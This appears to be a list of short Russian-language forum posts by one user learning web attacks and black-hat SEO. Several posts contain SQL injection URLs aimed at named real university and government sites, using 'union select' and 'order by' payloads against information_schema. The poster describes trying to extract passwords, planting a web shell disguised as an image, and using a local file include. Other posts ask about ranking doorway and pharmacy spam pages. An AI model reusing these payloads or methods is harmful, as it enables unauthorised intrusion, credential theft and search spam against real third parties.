Separate names with a comma.
спасибо, высвечивает хотябы привязанные к бд колоноки, разобраться можно) буду пробовать
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+latin1),4,5,6,7,8+from+information_schema....
прочитал таблицы в information_schema и попробовал достать пароль:...
http://events.wayne.edu/index.php?cat=24'+order+by+2/* при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время...
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2' это слепая инъекция?
вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php
local include залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:...
а выходит в топ тогда без разницы что двигать аптеку или дор?
недавно начал изучать тему, хотел бы получить ответ на мучающие меня вопросы от знающих людей. 1.если домен недавно зарегеный, то дор в топ...
